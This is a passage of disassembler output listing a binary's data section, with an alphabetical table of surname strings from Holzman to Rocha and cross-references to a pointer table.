aHolzman db 'Holzman',0 ; DATA XREF: _2:00447530�o
aHooker db 'Hooker',0 ; DATA XREF: _2:00447534�o
align 4
aHopkins db 'Hopkins',0 ; DATA XREF: _2:00447538�o
aHorsley db 'Horsley',0 ; DATA XREF: _2:0044753C�o
aHoshida db 'Hoshida',0 ; DATA XREF: _2:00447540�o
aHostage db 'Hostage',0 ; DATA XREF: _2:00447544�o
aHottle db 'Hottle',0 ; DATA XREF: _2:00447548�o
align 4
aHoward db 'Howard',0 ; DATA XREF: _2:0044754C�o
align 4
aHoy db 'Hoy',0 ; DATA XREF: _2:00447550�o
aHuey db 'Huey',0 ; DATA XREF: _2:00447554�o
align 4
aHuidekoper db 'Huidekoper',0 ; DATA XREF: _2:00447558�o
align 4
aHungerford db 'Hungerford',0 ; DATA XREF: _2:0044755C�o
align 10h
aHuntington db 'Huntington',0 ; DATA XREF: _2:00447560�o
align 4
aHupp db 'Hupp',0 ; DATA XREF: _2:00447564�o
align 4
aHurtubise db 'Hurtubise',0 ; DATA XREF: _2:00447568�o
align 10h
aHutchings db 'Hutchings',0 ; DATA XREF: _2:0044756C�o
align 4
aHyde db 'Hyde',0 ; DATA XREF: _2:00447570�o
align 4
aIaquinta db 'Iaquinta',0 ; DATA XREF: _2:00447574�o
align 10h
aIchikawa db 'Ichikawa',0 ; DATA XREF: _2:00447578�o
align 4
aIgarashi db 'Igarashi',0 ; DATA XREF: _2:0044757C�o
align 4
aInamura db 'Inamura',0 ; DATA XREF: _2:00447580�o
aInniss db 'Inniss',0 ; DATA XREF: _2:00447584�o
align 4
aIsaac db 'Isaac',0 ; DATA XREF: _2:00447588�o
align 10h
aIsaievych db 'Isaievych',0 ; DATA XREF: _2:0044758C�o
align 4
aIsbill db 'Isbill',0 ; DATA XREF: _2:00447590�o
align 4
aIsserman db 'Isserman',0 ; DATA XREF: _2:00447594�o
align 10h
aIyer db 'Iyer',0 ; DATA XREF: _2:00447598�o
align 4
aJacenko db 'Jacenko',0 ; DATA XREF: _2:0044759C�o
aJackson db 'Jackson',0 ; DATA XREF: _2:004475A0�o
aJagers db 'Jagers',0 ; DATA XREF: _2:004475A4�o
align 10h
aJagger db 'Jagger',0 ; DATA XREF: _2:004475A8�o
align 4
aJagoe db 'Jagoe',0 ; DATA XREF: _2:004475AC�o
align 10h
aJain db 'Jain',0 ; DATA XREF: _2:004475B0�o
align 4
aJamil db 'Jamil',0 ; DATA XREF: _2:004475B4�o
align 10h
aJanjigian db 'Janjigian',0 ; DATA XREF: _2:004475B8�o
align 4
aJarnagin db 'Jarnagin',0 ; DATA XREF: _2:004475BC�o
align 4
aJarrell db 'Jarrell',0 ; DATA XREF: _2:004475C0�o
aJay db 'Jay',0 ; DATA XREF: _2:004475C4�o
aJeffers db 'Jeffers',0 ; DATA XREF: _2:004475C8�o
aJellis db 'Jellis',0 ; DATA XREF: _2:004475CC�o
align 4
aJenkins db 'Jenkins',0 ; DATA XREF: _2:004475D0�o
aJespersen db 'Jespersen',0 ; DATA XREF: _2:004475D4�o
align 4
aJewett db 'Jewett',0 ; DATA XREF: _2:004475D8�o
align 10h
aJohannesson db 'Johannesson',0 ; DATA XREF: _2:004475DC�o
aJohannsen db 'Johannsen',0 ; DATA XREF: _2:004475E0�o
align 4
aJohns db 'Johns',0 ; DATA XREF: _2:004475E4�o
align 10h
aJolly db 'Jolly',0 ; DATA XREF: _2:004475E8�o
align 4
aJorgensen db 'Jorgensen',0 ; DATA XREF: _2:004475EC�o
align 4
aJucks db 'Jucks',0 ; DATA XREF: _2:004475F0�o
align 4
aJuliano db 'Juliano',0 ; DATA XREF: _2:004475F4�o
aJulious db 'Julious',0 ; DATA XREF: _2:004475F8�o
aKabbash db 'Kabbash',0 ; DATA XREF: _2:004475FC�o
aKaboolian db 'Kaboolian',0 ; DATA XREF: _2:00447600�o
align 10h
aKafadar db 'Kafadar',0 ; DATA XREF: _2:00447604�o
aKalbfleisch db 'Kalbfleisch',0 ; DATA XREF: _2:00447608�o
aKaligian db 'Kaligian',0 ; DATA XREF: _2:0044760C�o
align 10h
aKalil db 'Kalil',0 ; DATA XREF: _2:00447610�o
align 4
aKalinowski db 'Kalinowski',0 ; DATA XREF: _2:00447614�o
align 4
aKalman db 'Kalman',0 ; DATA XREF: _2:00447618�o
align 4
aKamel db 'Kamel',0 ; DATA XREF: _2:0044761C�o
align 4
aKangis db 'Kangis',0 ; DATA XREF: _2:00447620�o
align 4
aKarpouzes db 'Karpouzes',0 ; DATA XREF: _2:00447624�o
align 4
aKassower db 'Kassower',0 ; DATA XREF: _2:00447628�o
; _2:off_44A514�o
align 4
aKasten db 'Kasten',0 ; DATA XREF: _2:0044762C�o
align 4
aKawachi db 'Kawachi',0 ; DATA XREF: _2:00447630�o
aKee db 'Kee',0 ; DATA XREF: _2:00447634�o
aKeenan db 'Keenan',0 ; DATA XREF: _2:00447638�o
align 10h
aKeepper db 'Keepper',0 ; DATA XREF: _2:0044763C�o
aKeith db 'Keith',0 ; DATA XREF: _2:00447640�o
align 10h
aKelker db 'Kelker',0 ; DATA XREF: _2:00447644�o
align 4
aKelsey db 'Kelsey',0 ; DATA XREF: _2:00447648�o
align 10h
aKempton db 'Kempton',0 ; DATA XREF: _2:0044764C�o
aKemsley db 'Kemsley',0 ; DATA XREF: _2:00447650�o
aKendall db 'Kendall',0 ; DATA XREF: _2:00447654�o
aKerry db 'Kerry',0 ; DATA XREF: _2:00447658�o
align 10h
aKeul db 'Keul',0 ; DATA XREF: _2:0044765C�o
align 4
aKhong db 'Khong',0 ; DATA XREF: _2:00447660�o
align 10h
aKimmel db 'Kimmel',0 ; DATA XREF: _2:00447664�o
align 4
aKimmett db 'Kimmett',0 ; DATA XREF: _2:00447668�o
aKimura db 'Kimura',0 ; DATA XREF: _2:0044766C�o
align 4
aKindall db 'Kindall',0 ; DATA XREF: _2:00447670�o
aKinsley db 'Kinsley',0 ; DATA XREF: _2:00447674�o
aKippenberger db 'Kippenberger',0 ; DATA XREF: _2:00447678�o
align 4
aKirscht db 'Kirscht',0 ; DATA XREF: _2:0044767C�o
aKittridge db 'Kittridge',0 ; DATA XREF: _2:00447680�o
align 4
aKleckner db 'Kleckner',0 ; DATA XREF: _2:00447684�o
align 4
aKleiman db 'Kleiman',0 ; DATA XREF: _2:00447688�o
aKleinfelder db 'Kleinfelder',0 ; DATA XREF: _2:0044768C�o
aKlemperer db 'Klemperer',0 ; DATA XREF: _2:00447690�o
align 4
aKling db 'Kling',0 ; DATA XREF: _2:00447694�o
align 10h
aKlinkenborg db 'Klinkenborg',0 ; DATA XREF: _2:00447698�o
aKlint db 'Klint',0 ; DATA XREF: _2:0044769C�o
align 4
aKnuff db 'Knuff',0 ; DATA XREF: _2:004476A0�o
align 4
aKobrick db 'Kobrick',0 ; DATA XREF: _2:004476A4�o
aKoch db 'Koch',0 ; DATA XREF: _2:004476A8�o
align 4
aKohn db 'Kohn',0 ; DATA XREF: _2:004476AC�o
align 4
aKoivumaki db 'Koivumaki',0 ; DATA XREF: _2:004476B0�o
align 10h
aKommer db 'Kommer',0 ; DATA XREF: _2:004476B4�o
align 4
aKoniaris db 'Koniaris',0 ; DATA XREF: _2:004476B8�o
align 4
aKonrad db 'Konrad',0 ; DATA XREF: _2:004476BC�o
align 4
aKool db 'Kool',0 ; DATA XREF: _2:004476C0�o
align 4
aKorzybski db 'Korzybski',0 ; DATA XREF: _2:004476C4�o
align 10h
aKotter db 'Kotter',0 ; DATA XREF: _2:004476C8�o
align 4
aKovaks db 'Kovaks',0 ; DATA XREF: _2:004476CC�o
align 10h
aKraemer db 'Kraemer',0 ; DATA XREF: _2:004476D0�o
aKrailo db 'Krailo',0 ; DATA XREF: _2:004476D4�o
align 10h
aKrasney db 'Krasney',0 ; DATA XREF: _2:004476D8�o
aKraus db 'Kraus',0 ; DATA XREF: _2:004476DC�o
align 10h
aKroemer db 'Kroemer',0 ; DATA XREF: _2:004476E0�o
aKrysiak db 'Krysiak',0 ; DATA XREF: _2:004476E4�o
aKuenzli db 'Kuenzli',0 ; DATA XREF: _2:004476E8�o
aKumar db 'Kumar',0 ; DATA XREF: _2:004476EC�o
align 10h
aKusman db 'Kusman',0 ; DATA XREF: _2:004476F0�o
align 4
aKuwabara db 'Kuwabara',0 ; DATA XREF: _2:004476F4�o
align 4
aLa db 'La',0 ; DATA XREF: _2:004476F8�o
align 4
aLabunka db 'Labunka',0 ; DATA XREF: _2:004476FC�o
aLafler db 'Lafler',0 ; DATA XREF: _2:00447700�o
align 4
aLaing db 'Laing',0 ; DATA XREF: _2:00447704�o
align 10h
aLallemant db 'Lallemant',0 ; DATA XREF: _2:00447708�o
align 4
aLandes db 'Landes',0 ; DATA XREF: _2:0044770C�o
align 4
aLankes db 'Lankes',0 ; DATA XREF: _2:00447710�o
align 4
aLantieri db 'Lantieri',0 ; DATA XREF: _2:00447714�o
align 4
aLanzit db 'Lanzit',0 ; DATA XREF: _2:00447718�o
align 10h
aLaserna db 'Laserna',0 ; DATA XREF: _2:0044771C�o
aLashley db 'Lashley',0 ; DATA XREF: _2:00447720�o
aLawless db 'Lawless',0 ; DATA XREF: _2:00447724�o
aLecar db 'Lecar',0 ; DATA XREF: _2:00447728�o
align 10h
aLecce db 'Lecce',0 ; DATA XREF: _2:0044772C�o
align 4
aLeclercq db 'Leclercq',0 ; DATA XREF: _2:00447730�o
align 4
aLeite db 'Leite',0 ; DATA XREF: _2:00447734�o
align 4
aLenard db 'Lenard',0 ; DATA XREF: _2:00447738�o
align 4
aLEnclos db 'l',27h,'Enclos',0 ; DATA XREF: _2:0044773C�o
align 10h
aLesser db 'Lesser',0 ; DATA XREF: _2:00447740�o
align 4
aLessi db 'Lessi',0 ; DATA XREF: _2:00447744�o
align 10h
aLiakos db 'Liakos',0 ; DATA XREF: _2:00447748�o
align 4
aLidano db 'Lidano',0 ; DATA XREF: _2:0044774C�o
align 10h
aLiem db 'Liem',0 ; DATA XREF: _2:00447750�o
align 4
aLight db 'Light',0 ; DATA XREF: _2:00447754�o
align 10h
aLightfoot db 'Lightfoot',0 ; DATA XREF: _2:00447758�o
align 4
aLim db 'Lim',0 ; DATA XREF: _2:0044775C�o
aLinares db 'Linares',0 ; DATA XREF: _2:00447760�o
aLinda db 'Linda',0 ; DATA XREF: _2:00447764�o
align 10h
aLinder db 'Linder',0 ; DATA XREF: _2:00447768�o
align 4
aLine_0 db 'Line',0 ; DATA XREF: _2:0044776C�o
align 10h
aLinehan db 'Linehan',0 ; DATA XREF: _2:00447770�o
aLinzee db 'Linzee',0 ; DATA XREF: _2:00447774�o
align 10h
aLippmann db 'Lippmann',0 ; DATA XREF: _2:00447778�o
align 4
aLipponen db 'Lipponen',0 ; DATA XREF: _2:0044777C�o
align 4
aLittle db 'Little',0 ; DATA XREF: _2:00447780�o
align 10h
aLitvak db 'Litvak',0 ; DATA XREF: _2:00447784�o
align 4
aLivernash db 'Livernash',0 ; DATA XREF: _2:00447788�o
align 4
aLivi db 'Livi',0 ; DATA XREF: _2:0044778C�o
align 4
aLivolsi db 'Livolsi',0 ; DATA XREF: _2:00447790�o
aLizardo db 'Lizardo',0 ; DATA XREF: _2:00447794�o
aLocatelli db 'Locatelli',0 ; DATA XREF: _2:00447798�o
align 4
aLongworth db 'Longworth',0 ; DATA XREF: _2:0044779C�o
align 4
aLoss db 'Loss',0 ; DATA XREF: _2:004477A0�o
align 4
aLoveman db 'Loveman',0 ; DATA XREF: _2:004477A4�o
aLowenstein db 'Lowenstein',0 ; DATA XREF: _2:004477A8�o
align 10h
aLoza db 'Loza',0 ; DATA XREF: _2:004477AC�o
align 4
aLubin db 'Lubin',0 ; DATA XREF: _2:004477B0�o
align 10h
aLucas db 'Lucas',0 ; DATA XREF: _2:004477B4�o
align 4
aLuciano db 'Luciano',0 ; DATA XREF: _2:004477B8�o
aLuczkow db 'Luczkow',0 ; DATA XREF: _2:004477BC�o
aLuecke db 'Luecke',0 ; DATA XREF: _2:004477C0�o
align 10h
aLunetta db 'Lunetta',0 ; DATA XREF: _2:004477C4�o
aLuoma db 'Luoma',0 ; DATA XREF: _2:004477C8�o
align 10h
aLussier db 'Lussier',0 ; DATA XREF: _2:004477CC�o
aLutcavage db 'Lutcavage',0 ; DATA XREF: _2:004477D0�o
align 4
aLuzader db 'Luzader',0 ; DATA XREF: _2:004477D4�o
aMa db 'Ma',0 ; DATA XREF: _2:004477D8�o
align 10h
aMaccormac db 'Maccormac',0 ; DATA XREF: _2:004477DC�o
align 4
aMacdonald db 'Macdonald',0 ; DATA XREF: _2:004477E0�o
align 4
aMaceachern db 'Maceachern',0 ; DATA XREF: _2:004477E4�o
align 4
aMacintyre db 'Macintyre',0 ; DATA XREF: _2:004477E8�o
align 10h
aMackenney db 'Mackenney',0 ; DATA XREF: _2:004477EC�o
align 4
aMacmillan db 'MacMillan',0 ; DATA XREF: _2:004477F0�o
align 4
aMacy db 'Macy',0 ; DATA XREF: _2:004477F4�o
align 10h
aMadigan db 'Madigan',0 ; DATA XREF: _2:004477F8�o
aMaggio db 'Maggio',0 ; DATA XREF: _2:004477FC�o
align 10h
aMahony db 'Mahony',0 ; DATA XREF: _2:00447800�o
align 4
aMaier db 'Maier',0 ; DATA XREF: _2:00447804�o
align 10h
aMaineHershey db 'Maine-Hershey',0 ; DATA XREF: _2:00447808�o
align 10h
aMaisano db 'Maisano',0 ; DATA XREF: _2:0044780C�o
aMalatesta db 'Malatesta',0 ; DATA XREF: _2:00447810�o
align 4
aMaller db 'Maller',0 ; DATA XREF: _2:00447814�o
align 4
aMalova db 'Malova',0 ; DATA XREF: _2:00447818�o
align 4
aManalis db 'Manalis',0 ; DATA XREF: _2:0044781C�o
aMandel db 'Mandel',0 ; DATA XREF: _2:00447820�o
align 4
aManganiello db 'Manganiello',0 ; DATA XREF: _2:00447824�o
aMantovan db 'Mantovan',0 ; DATA XREF: _2:00447828�o
align 4
aMarch_0 db 'March',0 ; DATA XREF: _2:0044782C�o
align 4
aMarchbanks db 'Marchbanks',0 ; DATA XREF: _2:00447830�o
align 10h
aMarcus db 'Marcus',0 ; DATA XREF: _2:00447834�o
align 4
aMargalit db 'Margalit',0 ; DATA XREF: _2:00447838�o
align 4
aMargetts db 'Margetts',0 ; DATA XREF: _2:0044783C�o
align 10h
aMarques db 'Marques',0 ; DATA XREF: _2:00447840�o
aMartinez db 'Martinez',0 ; DATA XREF: _2:00447844�o
align 4
aMartochio db 'Martochio',0 ; DATA XREF: _2:00447848�o
align 10h
aMarton db 'Marton',0 ; DATA XREF: _2:0044784C�o
align 4
aMarubini db 'Marubini',0 ; DATA XREF: _2:00447850�o
align 4
aMass db 'Mass',0 ; DATA XREF: _2:00447854�o
align 4
aMatalka db 'Matalka',0 ; DATA XREF: _2:00447858�o
aMatarazzo db 'Matarazzo',0 ; DATA XREF: _2:0044785C�o
align 10h
aMatsukata db 'Matsukata',0 ; DATA XREF: _2:00447860�o
align 4
aMattson db 'Mattson',0 ; DATA XREF: _2:00447864�o
aMauzy db 'Mauzy',0 ; DATA XREF: _2:00447868�o
align 4
aMay_0 db 'May',0 ; DATA XREF: _2:0044786C�o
aMazzali db 'Mazzali',0 ; DATA XREF: _2:00447870�o
aMazziotta db 'Mazziotta',0 ; DATA XREF: _2:00447874�o
align 4
aMcbride db 'Mcbride',0 ; DATA XREF: _2:00447878�o
aMccaffery db 'Mccaffery',0 ; DATA XREF: _2:0044787C�o
align 4
aMccall db 'Mccall',0 ; DATA XREF: _2:00447880�o
align 10h
aMcclearn db 'Mcclearn',0 ; DATA XREF: _2:00447884�o
align 4
aMcdowell db 'Mcdowell',0 ; DATA XREF: _2:00447888�o
align 4
aMcelroy db 'Mcelroy',0 ; DATA XREF: _2:0044788C�o
aMcfadden db 'McFadden',0 ; DATA XREF: _2:00447890�o
align 4
aMcghee db 'Mcghee',0 ; DATA XREF: _2:00447894�o
align 4
aMcgoldrick db 'Mcgoldrick',0 ; DATA XREF: _2:00447898�o
align 10h
aMcilroy db 'McIlroy',0 ; DATA XREF: _2:0044789C�o
aMcintosh db 'Mcintosh',0 ; DATA XREF: _2:004478A0�o
align 4
aMckenna db 'Mckenna',0 ; DATA XREF: _2:004478A4�o
aMclane db 'Mclane',0 ; DATA XREF: _2:004478A8�o
align 4
aMclaren db 'Mclaren',0 ; DATA XREF: _2:004478AC�o
aMcnealy db 'Mcnealy',0 ; DATA XREF: _2:004478B0�o
aMcnulty db 'Mcnulty',0 ; DATA XREF: _2:004478B4�o
aMeccariello db 'Meccariello',0 ; DATA XREF: _2:004478B8�o
aMemisoglu db 'Memisoglu',0 ; DATA XREF: _2:004478BC�o
align 4
aMenzies db 'Menzies',0 ; DATA XREF: _2:004478C0�o
aMerikoski db 'Merikoski',0 ; DATA XREF: _2:004478C4�o
align 4
aMerlani db 'Merlani',0 ; DATA XREF: _2:004478C8�o
aMerminod db 'Merminod',0 ; DATA XREF: _2:004478CC�o
align 4
aMerseth db 'Merseth',0 ; DATA XREF: _2:004478D0�o
aMerz db 'Merz',0 ; DATA XREF: _2:004478D4�o
align 4
aMetelka db 'Metelka',0 ; DATA XREF: _2:004478D8�o
aMetropolis db 'Metropolis',0 ; DATA XREF: _2:004478DC�o
align 10h
aMeurer db 'Meurer',0 ; DATA XREF: _2:004478E0�o
align 4
aMichelman db 'Michelman',0 ; DATA XREF: _2:004478E4�o
align 4
aMiddle db 'Middle',0 ; DATA XREF: _2:004478E8�o
align 4
aMieher db 'Mieher',0 ; DATA XREF: _2:004478EC�o
align 4
aMills db 'Mills',0 ; DATA XREF: _2:004478F0�o
align 4
aMinh db 'Minh',0 ; DATA XREF: _2:004478F4�o
align 4
aMini db 'Mini',0 ; DATA XREF: _2:004478F8�o
align 4
aMinichiello db 'Minichiello',0 ; DATA XREF: _2:004478FC�o
aGonzalez db 'Gonzalez',0 ; DATA XREF: _2:00447900�o
align 4
aMitropoulos db 'Mitropoulos',0 ; DATA XREF: _2:00447904�o
aMittal db 'Mittal',0 ; DATA XREF: _2:00447908�o
align 4
aMocroft db 'Mocroft',0 ; DATA XREF: _2:0044790C�o
aModestino db 'Modestino',0 ; DATA XREF: _2:00447910�o
align 4
aMoeller db 'Moeller',0 ; DATA XREF: _2:00447914�o
aMohr db 'Mohr',0 ; DATA XREF: _2:00447918�o
align 4
aMoiamedi db 'Moiamedi',0 ; DATA XREF: _2:0044791C�o
align 4
aMonque db 'Monque',0 ; DATA XREF: _2:00447920�o
align 10h
aMontilio db 'Montilio',0 ; DATA XREF: _2:00447924�o
align 4
aMooredech_ db 'MooreDeCh.',0 ; DATA XREF: _2:00447928�o
align 4
aMorani db 'Morani',0 ; DATA XREF: _2:0044792C�o
align 10h
aMoreton db 'Moreton',0 ; DATA XREF: _2:00447930�o
aMorrison db 'Morrison',0 ; DATA XREF: _2:00447934�o
align 4
aMorrow db 'Morrow',0 ; DATA XREF: _2:00447938�o
align 4
aMortimer db 'Mortimer',0 ; DATA XREF: _2:0044793C�o
align 4
aMosher db 'Mosher',0 ; DATA XREF: _2:00447940�o
align 10h
aMosler db 'Mosler',0 ; DATA XREF: _2:00447944�o
align 4
aMostafavi db 'Mostafavi',0 ; DATA XREF: _2:00447948�o
align 4
aMotooka db 'Motooka',0 ; DATA XREF: _2:0044794C�o
aMudarri db 'Mudarri',0 ; DATA XREF: _2:00447950�o
aMuello db 'Muello',0 ; DATA XREF: _2:00447954�o
align 4
aMugnai db 'Mugnai',0 ; DATA XREF: _2:00447958�o
align 4
aMulkern db 'Mulkern',0 ; DATA XREF: _2:0044795C�o
aMulroy db 'Mulroy',0 ; DATA XREF: _2:00447960�o
align 4
aMumford db 'Mumford',0 ; DATA XREF: _2:00447964�o
aMussachio db 'Mussachio',0 ; DATA XREF: _2:00447968�o
align 4
aNaddeo db 'Naddeo',0 ; DATA XREF: _2:0044796C�o
align 10h
aNapolitano db 'Napolitano',0 ; DATA XREF: _2:00447970�o
align 4
aNardi db 'Nardi',0 ; DATA XREF: _2:00447974�o
align 4
aNardone db 'Nardone',0 ; DATA XREF: _2:00447978�o
aNaviaux db 'Naviaux',0 ; DATA XREF: _2:0044797C�o
aNayduch db 'Nayduch',0 ; DATA XREF: _2:00447980�o
aNelson db 'Nelson',0 ; DATA XREF: _2:00447984�o
align 4
aNenna db 'Nenna',0 ; DATA XREF: _2:00447988�o
align 4
aNesci db 'Nesci',0 ; DATA XREF: _2:0044798C�o
align 4
aNeuman db 'Neuman',0 ; DATA XREF: _2:00447990�o
align 4
aNewfeld db 'Newfeld',0 ; DATA XREF: _2:00447994�o
aNewlin db 'Newlin',0 ; DATA XREF: _2:00447998�o
align 4
aNg db 'Ng',0 ; DATA XREF: _2:0044799C�o
align 10h
aNi_0 db 'Ni',0 ; DATA XREF: _2:004479A0�o
align 4
aNickerson db 'Nickerson',0 ; DATA XREF: _2:004479A4�o
align 10h
aNickoloff db 'Nickoloff',0 ; DATA XREF: _2:004479A8�o
align 4
aNisenson db 'Nisenson',0 ; DATA XREF: _2:004479AC�o
align 4
aNitabach db 'Nitabach',0 ; DATA XREF: _2:004479B0�o
align 4
aNotman db 'Notman',0 ; DATA XREF: _2:004479B4�o
align 4
aNuzum db 'Nuzum',0 ; DATA XREF: _2:004479B8�o
align 4
aOcougne db 'Ocougne',0 ; DATA XREF: _2:004479BC�o
aOgata db 'Ogata',0 ; DATA XREF: _2:004479C0�o
align 4
aOh db 'Oh',0 ; DATA XREF: _2:004479C4�o
align 4
aOHagan db 'O',27h,'hagan',0 ; DATA XREF: _2:004479C8�o
aOldford db 'Oldford',0 ; DATA XREF: _2:004479CC�o
aOlsen db 'Olsen',0 ; DATA XREF: _2:004479D0�o
align 10h
aOlson db 'Olson',0 ; DATA XREF: _2:004479D4�o
align 4
aOlszewski db 'Olszewski',0 ; DATA XREF: _2:004479D8�o
align 4
aOMalley db 'O',27h,'malley',0 ; DATA XREF: _2:004479DC�o
align 10h
aOman db 'Oman',0 ; DATA XREF: _2:004479E0�o
align 4
aOMeara db 'O',27h,'meara',0 ; DATA XREF: _2:004479E4�o
aOpel db 'Opel',0 ; DATA XREF: _2:004479E8�o
align 4
aOray db 'Oray',0 ; DATA XREF: _2:004479EC�o
align 10h
aOrfield db 'Orfield',0 ; DATA XREF: _2:004479F0�o
aOrsi db 'Orsi',0 ; DATA XREF: _2:004479F4�o
align 10h
aOspina db 'Ospina',0 ; DATA XREF: _2:004479F8�o
align 4
aOstrowski db 'Ostrowski',0 ; DATA XREF: _2:004479FC�o
align 4
aOttaviani db 'Ottaviani',0 ; DATA XREF: _2:00447A00�o
align 10h
aOtten db 'Otten',0 ; DATA XREF: _2:00447A04�o
align 4
aOuchida db 'Ouchida',0 ; DATA XREF: _2:00447A08�o
aOvid db 'Ovid',0 ; DATA XREF: _2:00447A0C�o
align 4
aPaesdealmeida db 'PaesDealmeida',0 ; DATA XREF: _2:00447A10�o
align 4
aPaine db 'Paine',0 ; DATA XREF: _2:00447A14�o
align 10h
aPalayoor db 'Palayoor',0 ; DATA XREF: _2:00447A18�o
align 4
aPalepu db 'Palepu',0 ; DATA XREF: _2:00447A1C�o
align 4
aPallara db 'Pallara',0 ; DATA XREF: _2:00447A20�o
aPalmitesta db 'Palmitesta',0 ; DATA XREF: _2:00447A24�o
align 4
aPanadero db 'Panadero',0 ; DATA XREF: _2:00447A28�o
align 4
aPanizzon db 'Panizzon',0 ; DATA XREF: _2:00447A2C�o
align 10h
aPantilla db 'Pantilla',0 ; DATA XREF: _2:00447A30�o
align 4
aPaoletti db 'Paoletti',0 ; DATA XREF: _2:00447A34�o
align 4
aParmeggiani db 'Parmeggiani',0 ; DATA XREF: _2:00447A38�o
aParris db 'Parris',0 ; DATA XREF: _2:00447A3C�o
align 4
aPartridge db 'Partridge',0 ; DATA XREF: _2:00447A40�o
align 4
aPascucci db 'Pascucci',0 ; DATA XREF: _2:00447A44�o
align 4
aPatefield db 'Patefield',0 ; DATA XREF: _2:00447A48�o
align 10h
aPatrick db 'Patrick',0 ; DATA XREF: _2:00447A4C�o
aPattullo db 'Pattullo',0 ; DATA XREF: _2:00447A50�o
align 4
aPavetti db 'Pavetti',0 ; DATA XREF: _2:00447A54�o
aPavlon db 'Pavlon',0 ; DATA XREF: _2:00447A58�o
align 4
aPawloski db 'Pawloski',0 ; DATA XREF: _2:00447A5C�o
align 10h
aPaynter db 'Paynter',0 ; DATA XREF: _2:00447A60�o
aPeabody db 'Peabody',0 ; DATA XREF: _2:00447A64�o
aPearlberg db 'Pearlberg',0 ; DATA XREF: _2:00447A68�o
align 4
aPederson db 'Pederson',0 ; DATA XREF: _2:00447A6C�o
align 4
aPeishel db 'Peishel',0 ; DATA XREF: _2:00447A70�o
aPenny db 'Penny',0 ; DATA XREF: _2:00447A74�o
align 4
aPereira db 'Pereira',0 ; DATA XREF: _2:00447A78�o
aPerko db 'Perko',0 ; DATA XREF: _2:00447A7C�o
align 4
aPerlak db 'Perlak',0 ; DATA XREF: _2:00447A80�o
align 10h
aPerlman db 'Perlman',0 ; DATA XREF: _2:00447A84�o
aPerna db 'Perna',0 ; DATA XREF: _2:00447A88�o
align 10h
aPerone db 'Perone',0 ; DATA XREF: _2:00447A8C�o
align 4
aPerrimon db 'Perrimon',0 ; DATA XREF: _2:00447A90�o
align 4
aPeters db 'Peters',0 ; DATA XREF: _2:00447A94�o
align 4
aPetruzello db 'Petruzello',0 ; DATA XREF: _2:00447A98�o
align 4
aPettibone db 'Pettibone',0 ; DATA XREF: _2:00447A9C�o
align 4
aPettit db 'Pettit',0 ; DATA XREF: _2:00447AA0�o
align 4
aPfister db 'Pfister',0 ; DATA XREF: _2:00447AA4�o
aPilbeam db 'Pilbeam',0 ; DATA XREF: _2:00447AA8�o
aPinot db 'Pinot',0 ; DATA XREF: _2:00447AAC�o
align 4
aPlancon db 'Plancon',0 ; DATA XREF: _2:00447AB0�o
aPlant db 'Plant',0 ; DATA XREF: _2:00447AB4�o
align 4
aPlasket db 'Plasket',0 ; DATA XREF: _2:00447AB8�o
aPlous db 'Plous',0 ; DATA XREF: _2:00447ABC�o
align 4
aPo db 'Po',0 ; DATA XREF: _2:00447AC0�o
align 4
aPocobene db 'Pocobene',0 ; DATA XREF: _2:00447AC4�o
align 4
aPoincaire db 'Poincaire',0 ; DATA XREF: _2:00447AC8�o
align 10h
aPointer db 'Pointer',0 ; DATA XREF: _2:00447ACC�o
aPoirier db 'Poirier',0 ; DATA XREF: _2:00447AD0�o
aPolak db 'Polak',0 ; DATA XREF: _2:00447AD4�o
align 4
aPolanyi db 'Polanyi',0 ; DATA XREF: _2:00447AD8�o
aPolitis db 'Politis',0 ; DATA XREF: _2:00447ADC�o
aPoma db 'Poma',0 ; DATA XREF: _2:00447AE0�o
align 10h
aPoolman db 'Poolman',0 ; DATA XREF: _2:00447AE4�o
aPowers db 'Powers',0 ; DATA XREF: _2:00447AE8�o
align 10h
aPresper db 'Presper',0 ; DATA XREF: _2:00447AEC�o
aPreucel db 'Preucel',0 ; DATA XREF: _2:00447AF0�o
aPrevost db 'Prevost',0 ; DATA XREF: _2:00447AF4�o
aPritchard db 'Pritchard',0 ; DATA XREF: _2:00447AF8�o
align 4
aPritz db 'Pritz',0 ; DATA XREF: _2:00447AFC�o
align 4
aProietti db 'Proietti',0 ; DATA XREF: _2:00447B00�o
align 4
aProthrowStith db 'Prothrow-Stith',0 ; DATA XREF: _2:00447B04�o
align 4
aPuccia db 'Puccia',0 ; DATA XREF: _2:00447B08�o
align 10h
aPugh db 'Pugh',0 ; DATA XREF: _2:00447B0C�o
align 4
aPynchon db 'Pynchon',0 ; DATA XREF: _2:00447B10�o
aQuaday db 'Quaday',0 ; DATA XREF: _2:00447B14�o
align 4
aQuetin db 'Quetin',0 ; DATA XREF: _2:00447B18�o
align 10h
aRabe db 'Rabe',0 ; DATA XREF: _2:00447B1C�o
align 4
aRabkin db 'Rabkin',0 ; DATA XREF: _2:00447B20�o
align 10h
aRadeke db 'Radeke',0 ; DATA XREF: _2:00447B24�o
align 4
aRajagopalan db 'Rajagopalan',0 ; DATA XREF: _2:00447B28�o
aRaney db 'Raney',0 ; DATA XREF: _2:00447B2C�o
align 4
aRangan db 'Rangan',0 ; DATA XREF: _2:00447B30�o
align 4
aRankin db 'Rankin',0 ; DATA XREF: _2:00447B34�o
align 4
aRapple db 'Rapple',0 ; DATA XREF: _2:00447B38�o
align 4
aRayport db 'Rayport',0 ; DATA XREF: _2:00447B3C�o
aReddenTyler db 'Redden-Tyler',0 ; DATA XREF: _2:00447B40�o
align 4
aReedquist db 'Reedquist',0 ; DATA XREF: _2:00447B44�o
align 4
aCunningham db 'Cunningham',0 ; DATA XREF: _2:00447B48�o
align 4
aReinold db 'Reinold',0 ; DATA XREF: _2:00447B4C�o
aRemak db 'Remak',0 ; DATA XREF: _2:00447B50�o
align 4
aRenick db 'Renick',0 ; DATA XREF: _2:00447B54�o
align 4
aRepetto db 'Repetto',0 ; DATA XREF: _2:00447B58�o
aResnik db 'Resnik',0 ; DATA XREF: _2:00447B5C�o
align 4
aRhea db 'Rhea',0 ; DATA XREF: _2:00447B60�o
align 4
aRichmond db 'Richmond',0 ; DATA XREF: _2:00447B64�o
align 10h
aRielly db 'Rielly',0 ; DATA XREF: _2:00447B68�o
align 4
aRindos db 'Rindos',0 ; DATA XREF: _2:00447B6C�o
align 10h
aRineer db 'Rineer',0 ; DATA XREF: _2:00447B70�o
align 4
aRish db 'Rish',0 ; DATA XREF: _2:00447B74�o
align 10h
aRivera db 'Rivera',0 ; DATA XREF: _2:00447B78�o
align 4
aRobinson db 'Robinson',0 ; DATA XREF: _2:00447B7C�o
align 4
aRocha db 'Rocha',0 ; DATA XREF: _2:00447B80�o
align 4
